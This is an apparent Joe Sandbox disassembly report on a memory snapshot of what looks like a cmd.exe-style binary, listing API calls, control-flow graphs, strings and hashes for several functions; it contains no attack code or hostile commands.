                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB05C5
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05EF
                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB0605
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0632
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB0647
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                        • Part of subcall function 00007FF755CB4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                        • Part of subcall function 00007FF755CB4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF755CB4E35), ref: 00007FF755CB55DA
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5623
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5667
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB56BE
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5702
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E35
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E81
                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F69
                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F95
                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FB0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FC1
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FD8
                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FF8
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5037
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB504B
                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50DF
                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50F2
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB510F
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5130
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB514A
                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5175
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                      • API String ID: 1049357271-3021193919
                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction ID: 34fd07a89923f737413449967e35eeeeec52b77dd5d007abf6ac500ea12b64b1
                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction Fuzzy Hash: 1CC152FBA08A8386EA40BB11E854179F7A1FF85F99FCC4135D90E47791EF3CA8458260
                                      Function 00007FF755CB3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 732 7ff755cb3c24-7ff755cb3c61 733 7ff755cbec5a-7ff755cbec5f 732->733 734 7ff755cb3c67-7ff755cb3c99 call 7ff755caaf14 call 7ff755caca40 732->734 733->734 736 7ff755cbec65-7ff755cbec6a 733->736 743 7ff755cb3c9f-7ff755cb3cb2 call 7ff755cab900 734->743 744 7ff755cbec97-7ff755cbeca1 call 7ff755cb855c 734->744 738 7ff755cb412e-7ff755cb415b call 7ff755cb8f80 736->738 743->744 749 7ff755cb3cb8-7ff755cb3cbc 743->749 750 7ff755cb3cbf-7ff755cb3cc7 749->750 750->750 751 7ff755cb3cc9-7ff755cb3ccd 750->751 752 7ff755cb3cd2-7ff755cb3cd8 751->752 753 7ff755cb3ce5-7ff755cb3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff755cb3cda-7ff755cb3cdf 752->754 756 7ff755cb3fb8 753->756 757 7ff755cb3d68-7ff755cb3d6c 753->757 754->753 755 7ff755cb3faa-7ff755cb3fb3 754->755 755->752 759 7ff755cb3fc6-7ff755cb3fec GetLastError call 7ff755cb855c call 7ff755cba5d6 756->759 757->756 758 7ff755cb3d72-7ff755cb3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff755cb3dd3-7ff755cb3ddd 758->760 762 7ff755cb3ff1-7ff755cb4007 call 7ff755cb855c _local_unwind 759->762 760->762 763 7ff755cb3de3-7ff755cb3dfb 760->763 772 7ff755cb400c-7ff755cb4022 GetLastError 762->772 765 7ff755cb3e01-7ff755cb3e11 763->765 766 7ff755cb40fe-7ff755cb4119 call 7ff755cb855c _local_unwind 763->766 765->766 770 7ff755cb3e17-7ff755cb3e28 765->770 778 7ff755cb411a-7ff755cb412c call 7ff755caff70 call 7ff755cb855c 766->778 774 7ff755cb3e2c-7ff755cb3e34 770->774 776 7ff755cb3e95-7ff755cb3e9c 772->776 777 7ff755cb4028-7ff755cb402b 772->777 774->774 775 7ff755cb3e36-7ff755cb3e3f 774->775 779 7ff755cb3e42-7ff755cb3e55 775->779 781 7ff755cb3ecf-7ff755cb3ed3 776->781 782 7ff755cb3e9e-7ff755cb3ec2 call 7ff755cb2978 776->782 777->776 780 7ff755cb4031-7ff755cb4047 call 7ff755cb855c _local_unwind 777->780 778->738 784 7ff755cb3e66-7ff755cb3e8f GetFileAttributesW 779->784 785 7ff755cb3e57-7ff755cb3e60 779->785 799 7ff755cb404c-7ff755cb4062 call 7ff755cb855c _local_unwind 780->799 788 7ff755cb3ed5-7ff755cb3ef7 GetFileAttributesW 781->788 789 7ff755cb3f08-7ff755cb3f0b 781->789 793 7ff755cb3ec7-7ff755cb3ec9 782->793 784->772 784->776 785->784 791 7ff755cb3f9d-7ff755cb3fa5 785->791 794 7ff755cb4067-7ff755cb4098 GetLastError call 7ff755cb855c _local_unwind 788->794 795 7ff755cb3efd-7ff755cb3f02 788->795 797 7ff755cb3f0d-7ff755cb3f11 789->797 798 7ff755cb3f1e-7ff755cb3f40 SetCurrentDirectoryW 789->798 791->779 793->781 793->799 801 7ff755cb409d-7ff755cb40b3 call 7ff755cb855c _local_unwind 794->801 795->789 795->801 803 7ff755cb3f46-7ff755cb3f69 call 7ff755cb498c 797->803 804 7ff755cb3f13-7ff755cb3f1c 797->804 798->803 805 7ff755cb40b8-7ff755cb40de GetLastError call 7ff755cb855c _local_unwind 798->805 799->794 801->805 815 7ff755cb40e3-7ff755cb40f9 call 7ff755cb855c _local_unwind 803->815 816 7ff755cb3f6f-7ff755cb3f98 call 7ff755cb417c 803->816 804->798 804->803 805->815 815->766 816->778
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                      • String ID: :
                                      • API String ID: 1809961153-336475711
                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction ID: fa62394016a20937b2aca496992eb8b8f9b151329572276e60d126a9a8bc4680
                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction Fuzzy Hash: B9D16FABA0CB8691EA60EB15E4542B9F7A1FB84F58FC84135D98E437A4DF3CE944C710
                                      Function 00007FF755CB2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 914 7ff755cb2394-7ff755cb2416 memset call 7ff755caca40 917 7ff755cbe0d2-7ff755cbe0da call 7ff755cb4c1c 914->917 918 7ff755cb241c-7ff755cb2453 GetModuleFileNameW call 7ff755cb081c 914->918 923 7ff755cbe0db-7ff755cbe0ee call 7ff755cb498c 917->923 918->923 924 7ff755cb2459-7ff755cb2468 call 7ff755cb081c 918->924 929 7ff755cbe0f4-7ff755cbe107 call 7ff755cb498c 923->929 924->929 930 7ff755cb246e-7ff755cb247d call 7ff755cb081c 924->930 939 7ff755cbe10d-7ff755cbe123 929->939 935 7ff755cb2516-7ff755cb2529 call 7ff755cb498c 930->935 936 7ff755cb2483-7ff755cb2492 call 7ff755cb081c 930->936 935->936 936->939 947 7ff755cb2498-7ff755cb24a7 call 7ff755cb081c 936->947 942 7ff755cbe13f-7ff755cbe17a _wcsupr 939->942 943 7ff755cbe125-7ff755cbe139 wcschr 939->943 945 7ff755cbe181-7ff755cbe199 wcsrchr 942->945 946 7ff755cbe17c-7ff755cbe17f 942->946 943->942 944 7ff755cbe27c 943->944 949 7ff755cbe283-7ff755cbe29b call 7ff755cb498c 944->949 948 7ff755cbe19c 945->948 946->948 956 7ff755cbe2a1-7ff755cbe2c3 _wcsicmp 947->956 957 7ff755cb24ad-7ff755cb24c5 call 7ff755cb3c24 947->957 951 7ff755cbe1a0-7ff755cbe1a7 948->951 949->956 951->951 954 7ff755cbe1a9-7ff755cbe1bb 951->954 958 7ff755cbe1c1-7ff755cbe1e6 954->958 959 7ff755cbe264-7ff755cbe277 call 7ff755cb1300 954->959 964 7ff755cb24ca-7ff755cb24db 957->964 962 7ff755cbe21a 958->962 963 7ff755cbe1e8-7ff755cbe1f1 958->963 959->944 969 7ff755cbe21d-7ff755cbe21f 962->969 965 7ff755cbe201-7ff755cbe210 963->965 966 7ff755cbe1f3-7ff755cbe1f6 963->966 967 7ff755cb24e9-7ff755cb2514 call 7ff755cb8f80 964->967 968 7ff755cb24dd-7ff755cb24e4 ??_V@YAXPEAX@Z 964->968 965->962 971 7ff755cbe212-7ff755cbe218 965->971 966->965 970 7ff755cbe1f8-7ff755cbe1ff 966->970 968->967 969->949 973 7ff755cbe221-7ff755cbe228 969->973 970->965 970->966 971->969 975 7ff755cbe254-7ff755cbe262 973->975 976 7ff755cbe22a-7ff755cbe231 973->976 975->944 977 7ff755cbe234-7ff755cbe237 976->977 977->975 978 7ff755cbe239-7ff755cbe242 977->978 978->975 979 7ff755cbe244-7ff755cbe252 978->979 979->975 979->977
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                      • API String ID: 2622545777-4197029667
                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction ID: 1cdace2bd3fe6f00d5ef111cbce25f000504adc8c12956f338fceb3a4db3fe2b
                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction Fuzzy Hash: 359172BBB09A8785EE64AB50D8502B8A3A5FF49F98FC84135C94E47695DF3CE905C320
                                      Function 00007FF755CB0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID: CMD.EXE
                                      • API String ID: 1606018815-3025314500
                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction ID: 8baecc15e49cd004b83f18b21d64bf2d2e5a56cc4aa177d0c769905f067ba7ba
                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction Fuzzy Hash: ED41F3BAA09683CBE7456B15E845178FBA1FF89F59FCC4139C90E87360DF3CA4148660
                                      Function 00007FF755CAC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 992 7ff755cac620-7ff755cac66f GetConsoleTitleW 993 7ff755cbc5f2 992->993 994 7ff755cac675-7ff755cac687 call 7ff755caaf14 992->994 996 7ff755cbc5fc-7ff755cbc60c GetLastError 993->996 998 7ff755cac689 994->998 999 7ff755cac68e-7ff755cac69d call 7ff755caca40 994->999 1000 7ff755cbc5e3 call 7ff755ca3278 996->1000 998->999 1004 7ff755cbc5e8-7ff755cbc5ed call 7ff755cb855c 999->1004 1005 7ff755cac6a3-7ff755cac6ac 999->1005 1000->1004 1004->993 1007 7ff755cac6b2-7ff755cac6c5 call 7ff755cab9c0 1005->1007 1008 7ff755cac954-7ff755cac95e call 7ff755cb291c 1005->1008 1015 7ff755cac9b5-7ff755cac9b8 call 7ff755cb5c6c 1007->1015 1016 7ff755cac6cb-7ff755cac6ce 1007->1016 1013 7ff755cac964-7ff755cac972 call 7ff755ca89c0 1008->1013 1014 7ff755cbc5de-7ff755cbc5e0 1008->1014 1013->996 1024 7ff755cac978-7ff755cac99a towupper 1013->1024 1014->1000 1023 7ff755cac9bd-7ff755cac9c9 call 7ff755cb855c 1015->1023 1016->1004 1018 7ff755cac6d4-7ff755cac6e9 1016->1018 1021 7ff755cac6ef-7ff755cac6fa 1018->1021 1022 7ff755cbc616-7ff755cbc620 call 7ff755cb855c 1018->1022 1025 7ff755cac700-7ff755cac713 1021->1025 1026 7ff755cbc627 1021->1026 1022->1026 1037 7ff755cac9d0-7ff755cac9d7 1023->1037 1029 7ff755cac9a0-7ff755cac9a9 1024->1029 1030 7ff755cbc631 1025->1030 1031 7ff755cac719-7ff755cac72c 1025->1031 1026->1030 1029->1029 1034 7ff755cac9ab-7ff755cac9af 1029->1034 1036 7ff755cbc63b 1030->1036 1035 7ff755cac732-7ff755cac747 call 7ff755cad3f0 1031->1035 1031->1036 1034->1015 1038 7ff755cbc60e-7ff755cbc611 call 7ff755ccec14 1034->1038 1045 7ff755cac74d-7ff755cac750 1035->1045 1046 7ff755cac8ac-7ff755cac8af 1035->1046 1042 7ff755cbc645 1036->1042 1040 7ff755cac872-7ff755cac8aa call 7ff755cb855c call 7ff755cb8f80 1037->1040 1041 7ff755cac9dd-7ff755cbc6da SetConsoleTitleW 1037->1041 1038->1022 1041->1040 1053 7ff755cbc64e-7ff755cbc651 1042->1053 1049 7ff755cac752-7ff755cac764 call 7ff755cabd38 1045->1049 1050 7ff755cac76a-7ff755cac76d 1045->1050 1046->1045 1052 7ff755cac8b5-7ff755cac8d3 wcsncmp 1046->1052 1049->1004 1049->1050 1056 7ff755cac840-7ff755cac84b call 7ff755cacb40 1050->1056 1057 7ff755cac773-7ff755cac77a 1050->1057 1052->1050 1058 7ff755cac8d9 1052->1058 1059 7ff755cbc657-7ff755cbc65b 1053->1059 1060 7ff755cac80d-7ff755cac811 1053->1060 1077 7ff755cac856-7ff755cac86c 1056->1077 1078 7ff755cac84d-7ff755cac855 call 7ff755cacad4 1056->1078 1065 7ff755cac780-7ff755cac784 1057->1065 1058->1045 1059->1060 1061 7ff755cac9e2-7ff755cac9e7 1060->1061 1062 7ff755cac817-7ff755cac81b 1060->1062 1061->1062 1069 7ff755cac9ed-7ff755cac9f7 call 7ff755cb291c 1061->1069 1067 7ff755cac821 1062->1067 1068 7ff755caca1b-7ff755caca1f 1062->1068 1070 7ff755cac78a-7ff755cac7a4 wcschr 1065->1070 1071 7ff755cac83d 1065->1071 1073 7ff755cac824-7ff755cac82d 1067->1073 1068->1067 1079 7ff755caca25-7ff755cbc6b3 call 7ff755ca3278 1068->1079 1087 7ff755cbc684-7ff755cbc698 call 7ff755ca3278 1069->1087 1088 7ff755cac9fd-7ff755caca00 1069->1088 1075 7ff755cac7aa-7ff755cac7ad 1070->1075 1076 7ff755cac8de-7ff755cac8f7 1070->1076 1071->1056 1073->1073 1080 7ff755cac82f-7ff755cac837 1073->1080 1082 7ff755cac7b0-7ff755cac7b8 1075->1082 1083 7ff755cac900-7ff755cac908 1076->1083 1077->1037 1077->1040 1078->1077 1079->1004 1080->1065 1080->1071 1082->1082 1089 7ff755cac7ba-7ff755cac7c7 1082->1089 1083->1083 1090 7ff755cac90a-7ff755cac915 1083->1090 1087->1004 1088->1062 1094 7ff755caca06-7ff755caca10 call 7ff755ca89c0 1088->1094 1089->1053 1095 7ff755cac7cd-7ff755cac7db 1089->1095 1096 7ff755cac93a-7ff755cac944 1090->1096 1097 7ff755cac917 1090->1097 1094->1062 1113 7ff755caca16-7ff755cbc67f GetLastError call 7ff755ca3278 1094->1113 1102 7ff755cac7e0-7ff755cac7e7 1095->1102 1099 7ff755caca2a-7ff755caca2f call 7ff755cb9158 1096->1099 1100 7ff755cac94a 1096->1100 1103 7ff755cac920-7ff755cac928 1097->1103 1099->1014 1100->1008 1106 7ff755cac800-7ff755cac803 1102->1106 1107 7ff755cac7e9-7ff755cac7f1 1102->1107 1108 7ff755cac932-7ff755cac938 1103->1108 1109 7ff755cac92a-7ff755cac92f 1103->1109 1106->1042 1111 7ff755cac809 1106->1111 1107->1106 1114 7ff755cac7f3-7ff755cac7fe 1107->1114 1108->1096 1108->1103 1109->1108 1111->1060 1113->1004 1114->1102 1114->1106
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleTitlewcschr
                                      • String ID: /$:
                                      • API String ID: 2364928044-4222935259
                                      • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                      • Instruction ID: 2533290812a217f91998278a9da034bce6f7e06ef9d7a21e0825d9dddc855f55
                                      • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                      • Instruction Fuzzy Hash: 94C19EEBE0864381EA64BB25D4142B9A6A0FF81F98FCC5531E91E472D5EF3CE845D320
                                      Function 00007FF755CB8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1171 7ff755cb8d80-7ff755cb8da2 1172 7ff755cb8da4-7ff755cb8daf 1171->1172 1173 7ff755cb8db1-7ff755cb8db4 1172->1173 1174 7ff755cb8dcc 1172->1174 1175 7ff755cb8dbf-7ff755cb8dca Sleep 1173->1175 1176 7ff755cb8db6-7ff755cb8dbd 1173->1176 1177 7ff755cb8dd1-7ff755cb8dd9 1174->1177 1175->1172 1176->1177 1178 7ff755cb8de7-7ff755cb8def 1177->1178 1179 7ff755cb8ddb-7ff755cb8de5 _amsg_exit 1177->1179 1181 7ff755cb8df1-7ff755cb8e0a 1178->1181 1182 7ff755cb8e46 1178->1182 1180 7ff755cb8e4c-7ff755cb8e54 1179->1180 1183 7ff755cb8e56-7ff755cb8e69 _initterm 1180->1183 1184 7ff755cb8e73-7ff755cb8e75 1180->1184 1185 7ff755cb8e0e-7ff755cb8e11 1181->1185 1182->1180 1183->1184 1186 7ff755cb8e80-7ff755cb8e88 1184->1186 1187 7ff755cb8e77-7ff755cb8e79 1184->1187 1188 7ff755cb8e13-7ff755cb8e15 1185->1188 1189 7ff755cb8e38-7ff755cb8e3a 1185->1189 1190 7ff755cb8eb4-7ff755cb8ec8 call 7ff755cb37d8 1186->1190 1191 7ff755cb8e8a-7ff755cb8e98 call 7ff755cb94f0 1186->1191 1187->1186 1192 7ff755cb8e17-7ff755cb8e1b 1188->1192 1193 7ff755cb8e3c-7ff755cb8e41 1188->1193 1189->1180 1189->1193 1200 7ff755cb8ecd-7ff755cb8eda 1190->1200 1191->1190 1201 7ff755cb8e9a-7ff755cb8eaa 1191->1201 1196 7ff755cb8e2d-7ff755cb8e36 1192->1196 1197 7ff755cb8e1d-7ff755cb8e29 1192->1197 1194 7ff755cb8f28-7ff755cb8f3d 1193->1194 1196->1185 1197->1196 1203 7ff755cb8ee4-7ff755cb8eeb 1200->1203 1204 7ff755cb8edc-7ff755cb8ede exit 1200->1204 1201->1190 1205 7ff755cb8ef9 1203->1205 1206 7ff755cb8eed-7ff755cb8ef3 _cexit 1203->1206 1204->1203 1205->1194 1206->1205
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
